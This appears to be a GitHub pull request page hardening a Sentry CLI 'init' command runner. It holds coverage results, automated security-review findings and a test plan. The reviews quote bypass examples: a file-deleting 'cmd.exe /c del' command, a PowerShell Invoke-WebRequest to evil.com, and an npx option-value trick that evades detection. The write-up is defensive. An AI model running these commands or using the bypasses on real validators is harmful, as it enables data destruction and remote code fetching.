fix(init): harden install command execution #1045
Codecov Results: Patch coverage is 96.23%. Project has 4290 uncovered lines. Files with missing lines: 1.

Coverage diff:

@@ Coverage Diff @@
##             main      #PR      +/-   ##
==========================================
+ Coverage    81.98%   82.09%   +0.11%
==========================================
  Files          329      329        —
  Lines        23883    23958      +75
  Branches     15603    15682      +79
==========================================
+ Hits         19581    19668      +87
- Misses        4302     4290      -12
- Partials      1651     1653       +2

Generated by Codecov Action
BLOCKED_EXECUTABLES can be bypassed on Windows via cmd.exe or powershell.exe indirection (src/lib/init/tools/command-utils.ts:65)
Windows shell interpreters cmd, powershell, and pwsh are absent from BLOCKED_EXECUTABLES, so a command like cmd.exe /c del sensitive_file passes all validation: no shell metacharacter, first token normalizes to "cmd" which is not blocked, and the del token is never checked against the blocklist because only the first token is validated.
Evidence
- `validateCommand` calls `normalizeExecutableName(firstToken)` and checks only that against `BLOCKED_EXECUTABLES` (lines 307-308). `normalizeExecutableName("cmd.exe")` strips the `.exe` extension and returns `"cmd"`, which is not present in `BLOCKED_EXECUTABLES`.
- Tokens like `del`, `curl`, `wget`, `bash` appear at positions >0 and are never checked, so `cmd.exe /c del secrets.txt` or `powershell.exe -Command Invoke-WebRequest http://evil.com` pass validation and are executed by `spawn` with `shell: false` in `runSingleCommand`.
- `cd`, `pushd`, `popd` were just added to the blocklist in this hunk, confirming the intent to block indirect shell builtins, but `cmd`/`powershell`/`pwsh` were not added.
Identified by Warden security-review
Fixed the Windows shell-interpreter bypass in
Cursor Bugbot has reviewed your changes and found 1 potential issue.
Reviewed by Cursor Bugbot for commit f05a4a3.
Option-value args bypass recursive setup detection
Medium Severity
`findFirstNonOptionIndex` skips tokens starting with `-` but doesn't account for options that consume a separate value argument. This lets commands like `npx -p innocuous-pkg @sentry/wizard -i nextjs` or `npm exec --package lodash @sentry/wizard` bypass `isRecursiveSentrySetup`, because the option's value (e.g. `lodash`) is misidentified as the execution-position token, causing the actual sentry wizard token at the next index to be ignored by `canExecuteToken`.
Reviewed by Cursor Bugbot for commit f05a4a3.


Summary
Hardens the local `sentry init` command runner for install recovery. Windows now only uses shell execution for resolved `.cmd`/`.bat` shims, while regular `.exe` commands stay shell-free. The validator also blocks recursive Sentry setup variants and Windows shell expansion characters without adding a package-manager allowlist.

Test Plan

- `pnpm exec vitest run test/lib/init/tools/run-commands.test.ts test/lib/init/tools/run-commands-spawn.mocked.test.ts`
- `pnpm exec biome check --no-errors-on-unmatched src/lib/init/tools/command-utils.ts src/lib/init/tools/run-commands.ts test/lib/init/tools/run-commands.test.ts test/lib/init/tools/run-commands-spawn.mocked.test.ts`
- `pnpm run generate:schema && pnpm run test:changed`: 89 files passed, 2056 tests passed, 7 skipped